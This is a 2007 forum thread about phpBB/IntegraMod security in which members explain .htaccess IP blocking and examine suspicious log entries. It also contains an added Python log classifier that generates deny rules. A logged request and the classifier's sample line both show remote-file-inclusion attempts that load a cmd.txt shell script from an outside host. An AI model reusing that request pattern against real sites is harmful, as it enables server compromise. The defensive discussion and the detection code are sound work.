Security Flaw

This is where you'll find security related information.
Discuss Integramod/phpbb security issues here.

Moderator: Integra Moderator

Post by Omni-Lee » Thu May 17, 2007 10:42 am

"ZacFields" wrote:These IP's need to be blocked from .htaccess to prevent them from running requests on your forum's files.


Can you be more specific as to what type of requests? I assume you don't mean sql as that wouldn't be considered minor.

Re: Security Flaw

Post by Frost » Thu May 17, 2007 4:50 pm

He means any requests.

If you ban the IPs in .htaccess in your root directory, they can't access anything beyond that point (your whole site is gone to them).

Note: if you put this in .htaccess, say, 3 folders into your server, it only affects from then forward.

htaccess in root folder example

Access > [htaccess in root] > All Following Folders Denied

htaccess in later folder example

Access > Root > 2nd Folder > 3rd Folder > forum > [htaccess in forum] All Following Folders Denied

That way, an attacker would still have access to your root, 2nd, 3rd, and forum folders

That's how it works as far as I know

Post by ZacFields » Thu May 17, 2007 5:09 pm

Thanks Frost...I was kinda stumped a little when trying to think of how to explain a request.

Basically when you open a page in a forum, it performs a GET request for all the pieces of that page: the images, includes.php, all the aspects of that page. When you make a post... pretty much any time you press the "submit" button, it sends a POST request.

But for an example as to why you would want to ban things like this from .htaccess in your root: You all know what happens when you ban someone from your forum, right? Basically it opens up everything (all the requests still get performed) but IM software is written to recognize "hey, this guy is banned" and it sends them a nice little banned message saying that this site is banned.

But blocking from .htaccess, they can't even bother your server with requests because before they even get to your forums, or any file inside your forums your server itself recognizes that the IP is not supposed to be there so it actually prevents them from even seeing your site, or even performing any requests on the files in the same folder, or after your .htaccess file.

Hope that helps.

Zac

Post by Omni-Lee » Thu May 17, 2007 7:54 pm

Thank you both for the description.

CT is showing the attacks as slowing down, but they are still coming.

Today's:
17 May 2007 06:27 pm //includes/kb_constants.php?module_root_path=http://www.firp.it/smf/Themes/default/images/english/cmd.txt? libwww-perl/5.805 209.172.57.139

Another IP for the .htaccess file.

While scanning the server logs I found the following:
193.232.119.173 - - [17/May/2007:05:21:21 -0400] "GET //<siteURL>//<siteURL>/forum/profile.php?mode=profil&sub=profile_prefer&mod=0&sid=18b008b2c91954b94f342465c7274844 HTTP/1.1" 404 2351 <siteURL> "http://<siteURL>//<siteURL>//<SiteURL>/forum/profile.php?mode=profil&sub=profile_prefer&mod=0&sid=18b008b2c91954b94f342465c7274844" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-"

What do you make of it? It feels fishy, but I'd like confirmation.
Last edited by Omni-Lee on Fri May 18, 2007 8:55 pm, edited 1 time in total.
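As an added example (not code from this thread or from IntegraMod), the Python below parses Apache combined-format access log lines, flags the two patterns quoted above (a query parameter carrying a full URL, which is a remote-file-inclusion probe, and a hostname doubled into the request path), notes scripted user agents such as libwww-perl, and emits the root .htaccess deny lines Frost and Zac describe. The log lines, IP addresses and hostnames in it are constructed, not taken from the thread; the user-agent list is an assumption.

```python
import re
from urllib.parse import parse_qsl

# Apache combined-format line: ip ident user [time] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: (?P<rest>.*))?$'
)
# Assumption: user-agent substrings that mark scripted clients (libwww-perl appears in the thread).
SCANNER_UA = ("libwww-perl", "curl/", "python-urllib")
FULL_URL = re.compile(r'^(https?|ftp)://', re.I)
# "//host.tld/" inside the path, as in the doubled-hostname 404 quoted in the thread.
HOST_IN_PATH = re.compile(r'//[\w.-]+\.[a-z]{2,}/', re.I)

# Constructed sample lines (RFC 5737 addresses, placeholder hosts) modelled on the thread's requests.
SAMPLE_LOG = [
    '203.0.113.7 - - [17/May/2007:18:27:00 -0400] "GET /includes/kb_constants.php'
    '?module_root_path=http://attacker.example/cmd.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '198.51.100.9 - - [17/May/2007:05:21:21 -0400] "GET //forum.example//forum.example/forum'
    '/profile.php?mode=profil&sub=profile_prefer&mod=0 HTTP/1.1" 404 2351 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"',
    '192.0.2.44 - - [17/May/2007:05:22:10 -0400] "GET /forum/viewtopic.php?t=12 HTTP/1.1" 200 8840 "-" "Mozilla/5.0"',
]

def classify(line):
    """Return (client_ip, findings); an empty findings list means the request looks ordinary."""
    m = LOG_RE.match(line)
    if not m:
        return None, ["unparseable line"]
    findings = []
    path, _, query = m.group("target").partition("?")
    # Remote file inclusion marker: a parameter whose value is a full URL. parse_qsl also
    # percent-decodes, so an encoded http%3A%2F%2F... value is caught as well.
    for key, value in parse_qsl(query, keep_blank_values=True):
        if FULL_URL.match(value):
            findings.append(f"RFI attempt: {key}={value}")
    if HOST_IN_PATH.search(path):
        findings.append("hostname embedded in request path")
    ua = (m.group("rest") or "").lower()
    if any(s in ua for s in SCANNER_UA):
        findings.append("scripted client user-agent")
    return m.group("ip"), findings

def htaccess_deny(lines):
    """Apache 2.2-style .htaccess lines (Order/Deny syntax) for every flagged client IP."""
    bad = sorted({ip for ip, findings in map(classify, lines) if ip and findings})
    return ["Order Allow,Deny", "Allow from all"] + [f"Deny from {ip}" for ip in bad]
```

Apache 2.4 replaced Order/Deny with the Require directives (Require all granted, Require not ip ...), so adapt the emitted lines on that version.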
"Out, out, brief candle! Life's but a walking shadow, a poor player that struts and frets his hour upon the stage and then is heard no more: it is a tale told by an idiot, full of sound and fury, signifying nothing" - Macbeth ACT V, Scene V by William Shakespeare
User avatar
Omni-Lee
Members
Members
 
Posts: 69
Likes: 0 post
Liked in: 0 post
Joined: Wed Jan 31, 2007 11:07 pm
Cash on hand: 0.00

Post by nGAGE » Fri May 18, 2007 8:40 am

"Omni-Lee";p="25525" wrote:While scanning the server logs I found the following:
193.232.119.173 - - [17/May/2007:05:21:21 -0400] "GET //www.mithrilcrowns.net//www.mithrilcrowns.net/forum/profile.php?mode=profil&sub=profile_prefer&mod=0&sid=18b008b2c91954b94f342465c7274844 HTTP/1.1" 404 2351 http://www.mithrilcrowns.net "http://www.mithrilcrowns.net//www.mithrilcrowns.net//www.mithrilcrowns.net/forum/profile.php?mode=profil&sub=profile_prefer&mod=0&sid=18b008b2c91954b94f342465c7274844" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-"

What do you make of it? It feels fishy, but I'd like confirmation.

Looks like somebody's profile is being used to GET something through there or something... dunno, and I'm not gonna go to that link either ;)